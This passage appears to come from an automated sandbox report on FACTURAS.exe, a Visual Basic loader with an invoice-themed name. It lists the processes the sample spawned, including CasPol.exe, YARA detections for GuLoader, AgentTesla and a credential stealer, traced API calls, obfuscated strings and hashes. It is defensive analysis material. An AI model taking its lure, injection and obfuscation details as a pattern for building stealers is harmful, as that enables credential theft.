Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: CasPol.exe PID: 5196 Parent PID: 6316

General

Start time:	13:42:12
Start date:	14/12/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FACTURAS.exe"
Imagebase:	0xa30000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000000.21615424247.0000000000E10000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.22646307055.000000001DF31000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.22646307055.000000001DF31000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 1360 Parent PID: 5196

General

Start time:	13:42:12
Start date:	14/12/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6064f0000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: FACTURAS.exe PID: 6316 Parent PID: 2636 FACTURAS.exeCOMMON

Execution Graph

Execution Coverage:	11.5%
Dynamic/Decrypted Code Coverage:	2%
Signature Coverage:	0%
Total number of Nodes:	400
Total number of Limit Nodes:	40

Executed Functions

Function 0041E02C, Relevance: 500.4, APIs: 255, Strings: 30, Instructions: 1650COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401396), ref: 0041E04A
__vbaHresultCheckObj.MSVBVM60(00000000,004012A8,00402958,00000290), ref: 0041E0A7
__vbaVarDup.MSVBVM60(00000000,004012A8,00402958,00000290), ref: 0041E0E8
__vbaStrI4.MSVBVM60(002E6A19), ref: 0041E0F2
__vbaStrMove.MSVBVM60(002E6A19), ref: 0041E0FC
#667.MSVBVM60(?,00000000,002E6A19), ref: 0041E106
__vbaStrMove.MSVBVM60(?,00000000,002E6A19), ref: 0041E110
__vbaStrCmp.MSVBVM60(00000000,?,00000000,002E6A19), ref: 0041E116
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,?,00000000,002E6A19), ref: 0041E134
__vbaFreeVar.MSVBVM60(?,?,00401396), ref: 0041E13F
__vbaNew2.MSVBVM60(00402D44,004223F0,?,?,00401396), ref: 0041E166
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D34,00000014), ref: 0041E1C8
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D54,000000F8), ref: 0041E224
__vbaStrMove.MSVBVM60(00000000,?,00402D54,000000F8), ref: 0041E24E
__vbaFreeObj.MSVBVM60(00000000,?,00402D54,000000F8), ref: 0041E256
__vbaVarDup.MSVBVM60(00000000,?,00402D54,000000F8), ref: 0041E278
#666.MSVBVM60(?,?), ref: 0041E285
__vbaVarDup.MSVBVM60(?,?), ref: 0041E2AA
#524.MSVBVM60(?,?,?,?), ref: 0041E2BD
__vbaStrVarVal.MSVBVM60(?,?,svinghjulsarm,00000001,000000FF,00000000,?,?,?,?), ref: 0041E2D8
__vbaStrVarVal.MSVBVM60(00000000,?,00000000,?,?,svinghjulsarm,00000001,000000FF,00000000,?,?,?,?), ref: 0041E2E6
#712.MSVBVM60(00000000,00000000,?,00000000,?,?,svinghjulsarm,00000001,000000FF,00000000,?,?,?,?), ref: 0041E2EC
__vbaStrMove.MSVBVM60(00000000,00000000,?,00000000,?,?,svinghjulsarm,00000001,000000FF,00000000,?,?,?,?), ref: 0041E2F6
__vbaFreeStrList.MSVBVM60(00000002,00000000,?,00000000,00000000,?,00000000,?,?,svinghjulsarm,00000001,000000FF,00000000,?,?,?), ref: 0041E305
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?,?,?,?,?,?,00401396), ref: 0041E325
__vbaFPFix.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401396), ref: 0041E333
#704.MSVBVM60(00000004,000000FF,000000FE,000000FE,000000FE), ref: 0041E34E
__vbaStrMove.MSVBVM60(00000004,000000FF,000000FE,000000FE,000000FE), ref: 0041E358
__vbaStrCopy.MSVBVM60(00000004,000000FF,000000FE,000000FE,000000FE), ref: 0041E368
__vbaFreeStr.MSVBVM60(00000004,000000FF,000000FE,000000FE,000000FE), ref: 0041E370
__vbaFreeVar.MSVBVM60(00000004,000000FF,000000FE,000000FE,000000FE), ref: 0041E378
#613.MSVBVM60(?,00000003,00000004,000000FF,000000FE,000000FE,000000FE), ref: 0041E393
__vbaStrVarMove.MSVBVM60(?,?,00000003,00000004,000000FF,000000FE,000000FE,000000FE), ref: 0041E39C
__vbaStrMove.MSVBVM60(?,?,00000003,00000004,000000FF,000000FE,000000FE,000000FE), ref: 0041E3A6
__vbaStrCopy.MSVBVM60(?,?,00000003,00000004,000000FF,000000FE,000000FE,000000FE), ref: 0041E3B6
__vbaFreeStr.MSVBVM60(?,?,00000003,00000004,000000FF,000000FE,000000FE,000000FE), ref: 0041E3BE
__vbaFreeVarList.MSVBVM60(00000002,00000003,?,?,?,00000003,00000004,000000FF,000000FE,000000FE,000000FE), ref: 0041E3CD
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401396), ref: 0041E3E4
__vbaVarDup.MSVBVM60 ref: 0041E406
#607.MSVBVM60(?,00000097,?), ref: 0041E418
__vbaStrVarMove.MSVBVM60(?,?,?,00000097,?), ref: 0041E427
__vbaStrMove.MSVBVM60(?,?,?,00000097,?), ref: 0041E431
__vbaStrCmp.MSVBVM60(00000000,?,?,?,00000097,?), ref: 0041E437
__vbaFreeStr.MSVBVM60(00000000,?,?,?,00000097,?), ref: 0041E44D
__vbaFreeVarList.MSVBVM60(00000002,?,?,00000000,?,?,?,00000097,?), ref: 0041E45C
#572.MSVBVM60(00000002), ref: 0041E485
__vbaStrMove.MSVBVM60(00000002), ref: 0041E48F
#619.MSVBVM60(?,00000008,00000026,?,?,?,00000002), ref: 0041E4BE
__vbaStrVarMove.MSVBVM60(?,?,00000008,00000026,?,?,?,00000002), ref: 0041E4CA
__vbaStrMove.MSVBVM60(?,?,00000008,00000026,?,?,?,00000002), ref: 0041E4D4
__vbaStrCopy.MSVBVM60(?,?,00000008,00000026,?,?,?,00000002), ref: 0041E4E4
__vbaFreeStrList.MSVBVM60(00000002,?,00000000,?,?,00000008,00000026,?,?,?,00000002), ref: 0041E4F3
__vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 0041E50C
#716.MSVBVM60(?,ADODB.Stream,00000000), ref: 0041E51F
__vbaObjVar.MSVBVM60(?,?,ADODB.Stream,00000000), ref: 0041E528
__vbaObjSetAddref.MSVBVM60(00401214,00000000,?,?,ADODB.Stream,00000000), ref: 0041E537
__vbaFreeVar.MSVBVM60(00401214,00000000,?,?,ADODB.Stream,00000000), ref: 0041E53F
#716.MSVBVM60(?,Scripting.FileSystemObject,00000000,00401214,00000000,?,?,ADODB.Stream,00000000), ref: 0041E54F
__vbaObjVar.MSVBVM60(?,?,Scripting.FileSystemObject,00000000,00401214,00000000,?,?,ADODB.Stream,00000000), ref: 0041E558
__vbaObjSetAddref.MSVBVM60(00401210,00000000,?,?,Scripting.FileSystemObject,00000000,00401214,00000000,?,?,ADODB.Stream,00000000), ref: 0041E567
__vbaFreeVar.MSVBVM60(00401210,00000000,?,?,Scripting.FileSystemObject,00000000,00401214,00000000,?,?,ADODB.Stream,00000000), ref: 0041E56F
__vbaVarDup.MSVBVM60 ref: 0041E591
#666.MSVBVM60(?,?), ref: 0041E59E
__vbaVarCat.MSVBVM60(00000000,00000008,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041E5DA
__vbaChkstk.MSVBVM60(00000000,00000008,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041E5E4
__vbaChkstk.MSVBVM60(00000000,00000008,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041E5F2
__vbaLateMemCallLd.MSVBVM60(00000000,004202B8,CreateTextFile,00000002,00000000,00000008,?), ref: 0041E61A
__vbaObjVar.MSVBVM60(00000000,00401210,00000000,?,?,Scripting.FileSystemObject,00000000,00401214,00000000,?,?,ADODB.Stream,00000000), ref: 0041E623
__vbaObjSetAddref.MSVBVM60(0040120C,00000000,00000000,00401210,00000000,?,?,Scripting.FileSystemObject,00000000,00401214,00000000,?,?,ADODB.Stream,00000000), ref: 0041E632
__vbaFreeVarList.MSVBVM60(00000004,?,?,00000000,00000000,0040120C,00000000,00000000,00401210,00000000,?,?,Scripting.FileSystemObject,00000000,00401214,00000000), ref: 0041E64F
__vbaStrCmp.MSVBVM60(Wayment7,?), ref: 0041E667
#716.MSVBVM60(?,Scripting.FileSystemObject,00000000,Wayment7,?), ref: 0041E67F
__vbaObjVar.MSVBVM60(?,?,Scripting.FileSystemObject,00000000,Wayment7,?), ref: 0041E688
__vbaObjSetAddref.MSVBVM60(00401208,00000000,?,?,Scripting.FileSystemObject,00000000,Wayment7,?), ref: 0041E697
__vbaFreeVar.MSVBVM60(00401208,00000000,?,?,Scripting.FileSystemObject,00000000,Wayment7,?), ref: 0041E69F
__vbaVarDup.MSVBVM60 ref: 0041E6C1
#666.MSVBVM60(?,?), ref: 0041E6CE
__vbaVarCat.MSVBVM60(?,00000008,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041E70A
__vbaChkstk.MSVBVM60(?,00000008,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041E714
__vbaChkstk.MSVBVM60(?,00000008,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041E722
__vbaLateMemCallLd.MSVBVM60(?,00040006,CreateTextFile,00000002,?,00000008,?), ref: 0041E74A
__vbaObjVar.MSVBVM60(00000000,?,?,?,?,00401208,00000000,?,?,Scripting.FileSystemObject,00000000,Wayment7,?), ref: 0041E753
__vbaObjSetAddref.MSVBVM60(00401204,00000000,00000000,?,?,?,?,00401208,00000000,?,?,Scripting.FileSystemObject,00000000,Wayment7,?), ref: 0041E762
__vbaFreeVarList.MSVBVM60(00000004,?,?,00000000,?,00401204,00000000,00000000,?,?,?,?,00401208,00000000,?,?), ref: 0041E77F
__vbaVarDup.MSVBVM60 ref: 0041E7A4
#528.MSVBVM60(?,?), ref: 0041E7B1
__vbaHresultCheckObj.MSVBVM60(00000000,004012A8,00402958,00000260), ref: 0041F4D0
__vbaFreeStr.MSVBVM60(0041F57B), ref: 0041F53D
__vbaFreeStr.MSVBVM60(0041F57B), ref: 0041F545
__vbaFreeObj.MSVBVM60(0041F57B), ref: 0041F54D
__vbaFreeStr.MSVBVM60(0041F57B), ref: 0041F555
__vbaFreeStr.MSVBVM60(0041F57B), ref: 0041F55D
__vbaFreeStr.MSVBVM60(0041F57B), ref: 0041F565
__vbaFreeStr.MSVBVM60(0041F57B), ref: 0041F56D
__vbaFreeStr.MSVBVM60(0041F57B), ref: 0041F575

Strings

Equalised4, xrefs: 0041E96E
archemastry, xrefs: 0041E8C5
Unenjoyably, xrefs: 0041F328
Chemotropism1, xrefs: 0041F716
Gatfinnes, xrefs: 0041F802
svinghjulsarm, xrefs: 0041E2C8
\Bk119, xrefs: 0041E5A3
tmp, xrefs: 0041F291
Scripting.FileSystemObject, xrefs: 0041E546, 0041E676
CYKELENS, xrefs: 0041E828
HOGMANES, xrefs: 0041E973
CreateTextFile, xrefs: 0041E605, 0041E735
\Y8BvlQimiLpwrF4Mk23, xrefs: 0041E6D3
Wayment7, xrefs: 0041E662
Uigennemsigtighedens9, xrefs: 0041EA74
Tegngivningers5, xrefs: 0041F17E
extoller, xrefs: 0041E28A
\qb30Ii7QgBt9vIUPKwgIth148, xrefs: 0041F2C0
APETALOUSNESS, xrefs: 0041FA11
ADODB.Stream, xrefs: 0041E516, 0041EAB5
tandpleje, xrefs: 0041E787
NONFAT, xrefs: 0041EA6A
userprofile, xrefs: 0041E0CB
windir, xrefs: 0041E25B
indskrumpning, xrefs: 0041E978
TMP, xrefs: 0041E574, 0041E6A4
KATTEMUSIKKEN, xrefs: 0041F463
Formindskedes7, xrefs: 0041F85F
PHYSIANTHROPY, xrefs: 0041F9E5
OVERPRIZER, xrefs: 0041EA6F

Memory Dump Source

Source File: 00000001.00000002.21867138817.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.21867120301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.21867292253.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.21867312888.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FACTURAS.jbxd

Similarity

API ID: __vba$Free$Move$List$AddrefChkstk$CheckCopyHresult$#666#716$CallLate$#524#528#572#607#613#619#667#704#712New2
String ID: ADODB.Stream$APETALOUSNESS$CYKELENS$Chemotropism1$CreateTextFile$Equalised4$Formindskedes7$Gatfinnes$HOGMANES$KATTEMUSIKKEN$NONFAT$OVERPRIZER$PHYSIANTHROPY$Scripting.FileSystemObject$TMP$Tegngivningers5$Uigennemsigtighedens9$Unenjoyably$Wayment7$\Bk119$\Y8BvlQimiLpwrF4Mk23$\qb30Ii7QgBt9vIUPKwgIth148$archemastry$extoller$indskrumpning$svinghjulsarm$tandpleje$tmp$userprofile$windir
API String ID: 3015175179-3073247771
Opcode ID: 18c4761bfe4460e058d5e4ea0ce412503d97275578f5d625923a4c1101d81b15
Instruction ID: 46c9af60cbe40e98b84d64085873d9ad5f65c055f1a01e8da00752398014dc6e
Opcode Fuzzy Hash: 18c4761bfe4460e058d5e4ea0ce412503d97275578f5d625923a4c1101d81b15
Instruction Fuzzy Hash: AEF22A71900219ABDB20EFA1CC45FDEB7B4BF14304F1045BAE509BB1A1DB795A89CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041C944, Relevance: 265.1, APIs: 125, Strings: 26, Instructions: 884
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaChkstk.MSVBVM60(?,00401396), ref: 0041C962
#647.MSVBVM60(?,0000000A), ref: 0041C9B7
__vbaStrVarVal.MSVBVM60(?,?,?,0000000A), ref: 0041C9C7
#519.MSVBVM60(00000000,?,?,?,0000000A), ref: 0041C9CD
__vbaStrMove.MSVBVM60(00000000,?,?,?,0000000A), ref: 0041C9D7
__vbaFreeStr.MSVBVM60(00000000,?,?,?,0000000A), ref: 0041C9DF
__vbaFreeVarList.MSVBVM60(00000002,0000000A,?,00000000,?,?,?,0000000A), ref: 0041C9F4
#660.MSVBVM60(?,00000003,0000000A,00000001,00000001), ref: 0041CA3A
#515.MSVBVM60(?,?,0000002F,?,00000003,0000000A,00000001,00000001), ref: 0041CA4F
#645.MSVBVM60(?,00000000,?,?,0000002F,?,00000003,0000000A,00000001,00000001), ref: 0041CA5D
__vbaStrMove.MSVBVM60(?,00000000,?,?,0000002F,?,00000003,0000000A,00000001,00000001), ref: 0041CA67
__vbaStrCopy.MSVBVM60(?,00000000,?,?,0000002F,?,00000003,0000000A,00000001,00000001), ref: 0041CA74
__vbaFreeStr.MSVBVM60(?,00000000,?,?,0000002F,?,00000003,0000000A,00000001,00000001), ref: 0041CA7C
__vbaFreeVarList.MSVBVM60(00000004,00000003,0000000A,?,?,?,00000000,?,?,0000002F,?,00000003,0000000A,00000001,00000001), ref: 0041CA9F
__vbaOnError.MSVBVM60(00000000,?,?,?,?,?,?,?,00401396), ref: 0041CAB4
#554.MSVBVM60(00000000,?,?,?,?,?,?,?,00401396), ref: 0041CAB9
__vbaNew2.MSVBVM60(00402D44,004223F0,00000000,?,?,?,?,?,?,?,00401396), ref: 0041CAD1
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D34,00000014), ref: 0041CB33
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D54,00000108), ref: 0041CB92
__vbaFreeObj.MSVBVM60(00000000,?,00402D54,00000108), ref: 0041CBB4
#690.MSVBVM60(Turcize6,Sacrocotyloidean8,SLIDFAST,opfrisk), ref: 0041CBCD
__vbaVarDup.MSVBVM60(Turcize6,Sacrocotyloidean8,SLIDFAST,opfrisk), ref: 0041CBFC
#705.MSVBVM60(?,00000000), ref: 0041CC0A
__vbaStrMove.MSVBVM60(?,00000000), ref: 0041CC14
__vbaFreeVar.MSVBVM60(?,00000000), ref: 0041CC1F
__vbaLenBstr.MSVBVM60(LAPIDATOR,?,00000000), ref: 0041CC29
__vbaStrI4.MSVBVM60(00000000,LAPIDATOR,?,00000000), ref: 0041CC2F
__vbaStrMove.MSVBVM60(00000000,LAPIDATOR,?,00000000), ref: 0041CC39
__vbaStrCopy.MSVBVM60(00000000,LAPIDATOR,?,00000000), ref: 0041CC46
__vbaFreeStr.MSVBVM60(00000000,LAPIDATOR,?,00000000), ref: 0041CC4E
__vbaNew2.MSVBVM60(00402D44,004223F0,00000000,LAPIDATOR,?,00000000), ref: 0041CC66
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D34,00000014), ref: 0041CCC8
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D54,000000D0), ref: 0041CD24
__vbaStrMove.MSVBVM60(00000000,?,00402D54,000000D0), ref: 0041CD4E
__vbaFreeObj.MSVBVM60(00000000,?,00402D54,000000D0), ref: 0041CD56
#716.MSVBVM60(?,ADODB.Stream,00000000), ref: 0041CD69
__vbaObjVar.MSVBVM60(?,?,ADODB.Stream,00000000), ref: 0041CD75
__vbaObjSetAddref.MSVBVM60(?,00000000,?,?,ADODB.Stream,00000000), ref: 0041CD7F
__vbaFreeVar.MSVBVM60(?,00000000,?,?,ADODB.Stream,00000000), ref: 0041CD8A
#716.MSVBVM60(?,ADODB.Stream,00000000,?,?,?,?,?,?,?,00401396), ref: 0041CDA8
__vbaObjVar.MSVBVM60(?,?,ADODB.Stream,00000000,?,?,?,?,?,?,?,00401396), ref: 0041CDB4
__vbaObjSetAddref.MSVBVM60(?,00000000,?,?,ADODB.Stream,00000000,?,?,?,?,?,?,?,00401396), ref: 0041CDBE
__vbaFreeVar.MSVBVM60(?,00000000,?,?,ADODB.Stream,00000000,?,?,?,?,?,?,?,00401396), ref: 0041CDC9
__vbaVarDup.MSVBVM60(?,00000000,?,?,ADODB.Stream,00000000,?,00000000,?,?,ADODB.Stream,00000000), ref: 0041CDEE
#667.MSVBVM60(?), ref: 0041CDFA
__vbaStrMove.MSVBVM60(?), ref: 0041CE04
#527.MSVBVM60(00000000,?), ref: 0041CE0A
__vbaStrMove.MSVBVM60(00000000,?), ref: 0041CE14
__vbaFreeStr.MSVBVM60(00000000,?), ref: 0041CE1C
__vbaFreeVar.MSVBVM60(00000000,?), ref: 0041CE27
#648.MSVBVM60(0000000A,00000000,?), ref: 0041CE4F
__vbaFreeVar.MSVBVM60(0000000A,00000000,?), ref: 0041CE64
#696.MSVBVM60(Besjlede,0000000A,00000000,?), ref: 0041CE7F
#648.MSVBVM60(0000000A,Besjlede,0000000A,00000000,?), ref: 0041CEE2
__vbaFreeVar.MSVBVM60(0000000A,Besjlede,0000000A,00000000,?), ref: 0041CEFD
#523.MSVBVM60(Mitiest,0000000A,Besjlede,0000000A,00000000,?), ref: 0041CF19
__vbaStrMove.MSVBVM60(Mitiest,0000000A,Besjlede,0000000A,00000000,?), ref: 0041CF23
#696.MSVBVM60(trussereder,?,?,?,?,?,?,?,00401396), ref: 0041CF2D
__vbaLenBstr.MSVBVM60(TILFRSEL), ref: 0041CF5F
__vbaHresultCheckObj.MSVBVM60(?,?,00402988,000006F8), ref: 0041CFC7
__vbaVarDup.MSVBVM60(?,?,00402988,000006F8), ref: 0041D006
#607.MSVBVM60(?,000000DB,?), ref: 0041D01E
__vbaStrVarVal.MSVBVM60(?,?,?,000000DB,?), ref: 0041D02E
#696.MSVBVM60(00000000,?,?,?,000000DB,?), ref: 0041D034
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402988,000006FC), ref: 0041D07C
__vbaFreeStr.MSVBVM60(00000000,?,00402988,000006FC), ref: 0041D093
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041D0A8
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402988,00000700), ref: 0041D0E0
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402988,00000704), ref: 0041D14F
#692.MSVBVM60(?,promisingness,Venerologisk3), ref: 0041D180
#685.MSVBVM60(?,promisingness,Venerologisk3), ref: 0041D185
__vbaObjSet.MSVBVM60(?,00000000,?,promisingness,Venerologisk3), ref: 0041D18F
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00402ECC,0000001C), ref: 0041D1D6
__vbaStrVarMove.MSVBVM60(?), ref: 0041D204
__vbaStrMove.MSVBVM60(?), ref: 0041D20E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402988,00000708), ref: 0041D262
__vbaFreeStr.MSVBVM60(00000000,?,00402988,00000708), ref: 0041D284
__vbaFreeObj.MSVBVM60(00000000,?,00402988,00000708), ref: 0041D28C
__vbaFreeVar.MSVBVM60(00000000,?,00402988,00000708), ref: 0041D297
#539.MSVBVM60(?,000000C5,000000A2,00000057), ref: 0041D2AF
#651.MSVBVM60(00000002,?,000000C5,000000A2,00000057), ref: 0041D2CF
__vbaStrMove.MSVBVM60(00000002,?,000000C5,000000A2,00000057), ref: 0041D2D9
__vbaStrMove.MSVBVM60(00000002,?,000000C5,000000A2,00000057), ref: 0041D2FD
__vbaStrVarVal.MSVBVM60(?,?,?,PYLOROSTENOSIS,00002846,?,00000002,?,000000C5,000000A2,00000057), ref: 0041D32D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402988,0000070C), ref: 0041D36A
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041D398
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,trussereder), ref: 0041D3B0
__vbaVarDup.MSVBVM60 ref: 0041D3EC
#629.MSVBVM60(?,?,00000051,00000002), ref: 0041D408
#616.MSVBVM60(photosensitiser,000000BC,?,?,00000051,00000002), ref: 0041D417
__vbaStrMove.MSVBVM60(photosensitiser,000000BC,?,?,00000051,00000002), ref: 0041D421
__vbaVarDup.MSVBVM60(?,?,photosensitiser,000000BC,?,?,00000051,00000002), ref: 0041D446
#607.MSVBVM60(?,000000CF,?,?,?,photosensitiser,000000BC,?,?,00000051,00000002), ref: 0041D45E
__vbaStrVarMove.MSVBVM60(?,?,000000CF,?,?,?,photosensitiser,000000BC,?,?,00000051,00000002), ref: 0041D480
__vbaStrMove.MSVBVM60(?,?,000000CF,?,?,?,photosensitiser,000000BC,?,?,00000051,00000002), ref: 0041D48A
__vbaStrVarVal.MSVBVM60(?,?,000052D6,00003E74,?,?,?,000000CF,?,?,?,photosensitiser,000000BC,?,?,00000051), ref: 0041D4AD
__vbaStrMove.MSVBVM60(00000000,?,?,000052D6,00003E74,?,?,?,000000CF,?,?,?,photosensitiser,000000BC,?,?), ref: 0041D4BC
__vbaLenBstrB.MSVBVM60(00000000,00000000,?,?,000052D6,00003E74,?,?,?,000000CF,?,?,?,photosensitiser,000000BC,?), ref: 0041D4C2
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402988,00000710,?,?,?,?,?,?,?,?,?,photosensitiser,000000BC,?), ref: 0041D4FC
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,00000000), ref: 0041D52E
__vbaFreeVarList.MSVBVM60(00000005,?,?,?,?,?), ref: 0041D55B
__vbaLenBstr.MSVBVM60(chaussebrolgnings), ref: 0041D5BE
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402988,00000714), ref: 0041D613
#648.MSVBVM60(0000000A), ref: 0041D63F
__vbaFreeVar.MSVBVM60 ref: 0041D6A7
__vbaStrI4.MSVBVM60(004EAD83), ref: 0041D6B1
__vbaStrMove.MSVBVM60(004EAD83), ref: 0041D6BB
#696.MSVBVM60(00000000,004EAD83), ref: 0041D6C1
#611.MSVBVM60(00000000,004EAD83), ref: 0041D6CD
__vbaStrMove.MSVBVM60(00000000,004EAD83), ref: 0041D6D7
__vbaStrMove.MSVBVM60(00006082,00000000,004EAD83), ref: 0041D6F7
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041D71F

Part of subcall function 00420D84: __vbaChkstk.MSVBVM60(?,0041D72C), ref: 00420D8A
Part of subcall function 00420D84: #644.MSVBVM60(?,?,0041D72C), ref: 00420DB4

__vbaVarMove.MSVBVM60 ref: 0041D749
__vbaVarMove.MSVBVM60 ref: 0041D76B
__vbaVarIdiv.MSVBVM60(0000000A,?,?), ref: 0041D77F
__vbaI4Var.MSVBVM60(00000000,0000000A,?,?), ref: 0041D785
__vbaFreeVar.MSVBVM60(0041D840), ref: 0041D7FA
__vbaFreeObj.MSVBVM60(0041D840), ref: 0041D802
__vbaFreeStr.MSVBVM60(0041D840), ref: 0041D80A
__vbaFreeStr.MSVBVM60(0041D840), ref: 0041D812
__vbaFreeStr.MSVBVM60(0041D840), ref: 0041D81A
__vbaFreeStr.MSVBVM60(0041D840), ref: 0041D822
__vbaFreeVar.MSVBVM60(0041D840), ref: 0041D82A
__vbaFreeObj.MSVBVM60(0041D840), ref: 0041D832
__vbaFreeStr.MSVBVM60(0041D840), ref: 0041D83A

Strings

Besjlede, xrefs: 0041CE7A
9/9/9, xrefs: 0041CBDC
chaussebrolgnings, xrefs: 0041D5B9
PYLOROSTENOSIS, xrefs: 0041D319
trussereder, xrefs: 0041CF28
PA, xrefs: 0041D2B4
SLIDFAST, xrefs: 0041CBBE
LAPIDATOR, xrefs: 0041CC24
Mitiest, xrefs: 0041CF14
heminee, xrefs: 0041D5CB
Sacrocotyloidean8, xrefs: 0041CBC3
fl, xrefs: 0041D0F4
forkul, xrefs: 0041D682
photosensitiser, xrefs: 0041D412
STATUTTERNES, xrefs: 0041CF76
promisingness, xrefs: 0041D174
Turcize6, xrefs: 0041CBC8
opfrisk, xrefs: 0041CBB9
FREMMDET, xrefs: 0041D3CC
., xrefs: 0041D3B8
ADODB.Stream, xrefs: 0041CD5D, 0041CD9C
Venerologisk3, xrefs: 0041D16F
F(, xrefs: 0041D2DE
userprofile, xrefs: 0041CDCE
UROSIGNALERNES, xrefs: 0041D10E
TILFRSEL, xrefs: 0041CF5A

Memory Dump Source

Source File: 00000001.00000002.21867138817.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.21867120301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.21867292253.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.21867312888.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FACTURAS.jbxd

Similarity

API ID: __vba$Free$Move$CheckHresult$List$#696Bstr$#648$#607#716AddrefChkstkCopyNew2$#515#519#523#527#539#554#611#616#629#644#645#647#651#660#667#685#690#692#705ErrorIdiv
String ID: .$9/9/9$ADODB.Stream$Besjlede$F($FREMMDET$LAPIDATOR$Mitiest$PA$PYLOROSTENOSIS$SLIDFAST$STATUTTERNES$Sacrocotyloidean8$TILFRSEL$Turcize6$UROSIGNALERNES$Venerologisk3$chaussebrolgnings$fl$forkul$heminee$opfrisk$photosensitiser$promisingness$trussereder$userprofile
API String ID: 3516384700-1137539859
Opcode ID: 8d6cd7b8fd8fe29aabf2ef570d4ee878eb558a0a5438e8d236a8b365e08c8638
Instruction ID: 9f350eacd96625a8e8268e2a0d1f558e396a0bef4d2487ec0f431909302e4807
Opcode Fuzzy Hash: 8d6cd7b8fd8fe29aabf2ef570d4ee878eb558a0a5438e8d236a8b365e08c8638
Instruction Fuzzy Hash: F2923A7194021DABDB21DF90CD46FDDB7B8BF04304F0045AAE609BB1A1DBB99A85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004202E8, Relevance: 249.2, APIs: 123, Strings: 19, Instructions: 696
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaChkstk.MSVBVM60(?,00401396), ref: 00420305
__vbaStrCopy.MSVBVM60(?,?,?,?,00401396), ref: 0042031D
#514.MSVBVM60(Sternotracheal5,000000C1), ref: 0042033A
__vbaStrMove.MSVBVM60(Sternotracheal5,000000C1), ref: 00420344
#696.MSVBVM60(00000000,Sternotracheal5,000000C1), ref: 0042034A
#648.MSVBVM60(0000000A,00000000,Sternotracheal5,000000C1), ref: 00420356
__vbaFreeStr.MSVBVM60(0000000A,00000000,Sternotracheal5,000000C1), ref: 0042036F
__vbaFreeVar.MSVBVM60(0000000A,00000000,Sternotracheal5,000000C1), ref: 00420377
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,0000000A,00000000,Sternotracheal5,000000C1), ref: 004203A5
#515.MSVBVM60(?,0000000A,000000ED,?,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 004203B7
__vbaStrVarMove.MSVBVM60(?,?,0000000A,000000ED), ref: 004203C0
__vbaStrMove.MSVBVM60(?,?,0000000A,000000ED), ref: 004203CA
__vbaStrCopy.MSVBVM60(?,?,0000000A,000000ED), ref: 004203DA
__vbaFreeStr.MSVBVM60(?,?,0000000A,000000ED), ref: 004203E2
